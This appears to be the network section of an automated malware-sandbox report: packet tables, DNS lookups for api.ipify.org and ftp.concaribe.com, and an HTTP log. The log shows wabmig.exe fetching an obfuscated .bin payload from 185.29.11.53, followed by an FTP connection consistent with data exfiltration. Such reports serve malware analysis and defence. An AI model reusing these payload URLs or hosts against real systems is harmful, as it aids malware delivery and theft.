Sep 25, 2024 12:09:07.692974091 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692992926 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.693023920 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.693537951 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.693552971 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.693567038 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.693576097 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.693589926 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.693603992 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.766168118 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.766191006 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.766216993 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.766226053 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.766232967 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.766252041 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.766266108 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.766266108 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.766268015 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.766277075 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.766287088 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.766297102 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.766314983 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.766326904 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.767013073 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.767025948 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.767050982 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.767061949 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.772326946 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.772341967 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.772380114 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.772397041 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.772430897 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.772454023 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.772469044 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.772473097 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.772485018 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.772490978 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.772502899 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.772506952 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.772526026 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.772540092 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.773322105 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.773336887 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.773351908 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.773369074 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.773386002 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.773691893 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.773706913 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.773729086 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.773736000 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.773745060 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.773751974 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.773762941 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.773773909 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.773798943 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.774561882 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.774610043 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.778964996 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779021025 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779062033 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779078007 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779092073 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779104948 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779117107 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779123068 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779133081 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779150963 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779151917 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779175043 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779190063 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779637098 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779660940 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779676914 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779680014 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779692888 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779696941 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779710054 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779715061 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779726982 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.779731989 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779747009 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.779761076 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.780572891 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.780590057 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.780603886 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.780617952 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.780618906 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.780636072 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.780637980 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.780659914 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.780683041 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.846869946 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.846960068 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.846976995 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.846992016 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.847007990 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.847022057 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.847038031 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.847091913 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.847170115 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.847304106 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.853091002 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853204966 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853219032 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853234053 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853247881 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853264093 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853277922 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853339911 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.853409052 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.853540897 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853564024 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853579998 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853593111 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853607893 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.853626013 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.853671074 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.860209942 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860227108 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860253096 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860270023 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860292912 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860306025 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860323906 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860331059 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.860388041 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.860599995 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860615969 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860630035 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860673904 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860682011 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.860688925 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860703945 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860718966 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.860748053 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.860797882 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.861444950 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.861476898 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.861491919 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.861526012 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.861541986 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.861552000 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.861610889 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.866861105 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.866877079 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.866889954 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.866914034 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.866936922 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.866951942 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.866966963 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.866972923 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.866983891 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867027998 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.867088079 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.867285967 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867338896 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867353916 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867405891 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867419004 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.867420912 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867436886 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867453098 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867469072 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.867508888 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.867557049 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.868268967 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.868283987 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.868299961 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.868329048 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.868350983 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.868355989 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.868366957 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.868381977 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.868397951 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.868441105 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.868494987 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.869164944 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.869221926 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.869240046 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.869291067 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.869299889 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.869306087 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.869321108 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.869335890 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.869350910 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.869384050 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.869434118 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.870101929 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.870116949 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.870182037 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.933084011 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933115959 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933130980 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933146000 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933161974 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933175087 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933188915 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933202982 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933211088 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.933218002 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933233023 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933249950 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933263063 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.933269024 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933276892 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.933294058 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.933336020 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.933672905 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933686972 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.933839083 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939546108 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939605951 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939620972 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939635992 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939656973 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939687967 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939712048 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939727068 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939750910 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939768076 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939783096 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939810991 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939826012 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939848900 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939850092 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939863920 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939865112 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939881086 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939882040 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939897060 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939901114 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939913988 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939920902 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939930916 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939937115 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939948082 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.939949989 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939971924 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.939987898 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940690041 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940704107 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940720081 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940732002 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940751076 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940754890 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940769911 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940783024 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940788984 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940807104 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940815926 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940824032 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940843105 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940846920 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940864086 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940869093 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940879107 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.940886974 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940903902 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.940922976 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.946329117 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946352959 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946367979 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946388960 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946403027 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946417093 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946439981 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946440935 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.946455956 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946470976 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946485043 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946500063 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946516037 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946554899 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.946624994 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.946779013 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946800947 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946815014 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946830034 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946844101 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.946851015 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.946954012 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:08.361170053 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:08.361244917 CEST	443	49738	104.26.13.205	192.168.2.4
Sep 25, 2024 12:09:08.361495018 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:08.393265963 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:08.393292904 CEST	443	49738	104.26.13.205	192.168.2.4
Sep 25, 2024 12:09:08.854000092 CEST	443	49738	104.26.13.205	192.168.2.4
Sep 25, 2024 12:09:08.854111910 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:08.866796017 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:08.866838932 CEST	443	49738	104.26.13.205	192.168.2.4
Sep 25, 2024 12:09:08.867244959 CEST	443	49738	104.26.13.205	192.168.2.4
Sep 25, 2024 12:09:08.919559956 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:09.128837109 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:09.171418905 CEST	443	49738	104.26.13.205	192.168.2.4
Sep 25, 2024 12:09:09.239191055 CEST	443	49738	104.26.13.205	192.168.2.4
Sep 25, 2024 12:09:09.239259958 CEST	443	49738	104.26.13.205	192.168.2.4
Sep 25, 2024 12:09:09.239317894 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:09.266324997 CEST	49738	443	192.168.2.4	104.26.13.205
Sep 25, 2024 12:09:10.711536884 CEST	49739	21	192.168.2.4	192.185.13.234
Sep 25, 2024 12:09:10.718565941 CEST	21	49739	192.185.13.234	192.168.2.4
Sep 25, 2024 12:09:10.718645096 CEST	49739	21	192.168.2.4	192.185.13.234
Sep 25, 2024 12:09:10.720813990 CEST	49739	21	192.168.2.4	192.185.13.234
Sep 25, 2024 12:09:10.725734949 CEST	21	49739	192.185.13.234	192.168.2.4
Sep 25, 2024 12:09:10.725806952 CEST	49739	21	192.168.2.4	192.185.13.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 12:09:08.330909014 CEST	59864	53	192.168.2.4	1.1.1.1
Sep 25, 2024 12:09:08.338037968 CEST	53	59864	1.1.1.1	192.168.2.4
Sep 25, 2024 12:09:10.394656897 CEST	59846	53	192.168.2.4	1.1.1.1
Sep 25, 2024 12:09:10.710258007 CEST	53	59846	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 12:09:08.330909014 CEST	192.168.2.4	1.1.1.1	0xefb3	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 25, 2024 12:09:10.394656897 CEST	192.168.2.4	1.1.1.1	0xc7d6	Standard query (0)	ftp.concaribe.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 12:09:08.338037968 CEST	1.1.1.1	192.168.2.4	0xefb3	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 25, 2024 12:09:08.338037968 CEST	1.1.1.1	192.168.2.4	0xefb3	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 25, 2024 12:09:08.338037968 CEST	1.1.1.1	192.168.2.4	0xefb3	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 25, 2024 12:09:10.710258007 CEST	1.1.1.1	192.168.2.4	0xc7d6	No error (0)	ftp.concaribe.com	concaribe.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 25, 2024 12:09:10.710258007 CEST	1.1.1.1	192.168.2.4	0xc7d6	No error (0)	concaribe.com		192.185.13.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

185.29.11.53

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.29.11.53	80	6824	C:\Program Files (x86)\Windows Mail\wabmig.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 12:09:06.924766064 CEST	177	OUT	GET /bIGuEflfnZjESw74.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 185.29.11.53 Cache-Control: no-cache
